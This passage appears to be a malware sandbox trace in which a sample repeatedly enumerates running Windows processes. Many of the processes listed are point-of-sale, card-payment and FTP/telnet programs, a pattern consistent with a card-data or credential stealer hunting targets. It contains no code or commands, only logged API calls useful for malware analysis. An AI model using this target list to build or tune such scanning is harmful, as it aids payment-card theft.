th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0150.245] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0150.247] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0150.250] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0150.252] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0150.255] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0150.257] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0150.259] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0150.262] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0150.264] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0150.267] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0150.269] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0150.272] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0150.275] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0150.293] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0150.296] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0150.304] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0150.306] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0150.309] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0150.312] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0150.314] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0150.316] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0150.319] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0150.321] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0150.324] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0150.326] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 0 [0150.328] CloseHandle (hObject=0x1bf8) returned 1 [0150.329] Sleep (dwMilliseconds=0x64) [0150.472] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1460 [0150.488] Process32First (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0150.490] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7a, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0150.494] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0150.496] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0150.498] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0150.500] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0150.502] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0150.504] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0150.507] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0150.509] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.530] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.533] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0150.535] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.537] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.539] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.541] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.543] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.549] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.552] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.554] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0150.556] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0150.558] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0150.560] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0150.563] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.565] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0150.567] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0150.573] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0150.575] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0150.577] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0150.579] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0150.582] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.584] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0150.586] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0150.588] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0150.590] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0150.594] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.596] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0150.598] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0150.600] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0150.602] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0150.604] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0150.606] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0150.608] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0150.689] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0150.691] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0150.693] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0150.697] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0150.699] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0150.701] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0150.703] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0150.705] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0150.708] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0150.710] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0150.712] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0150.714] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0150.716] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0150.719] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0150.721] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0150.723] Process32Next (in: hSnapshot=0x1460, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, 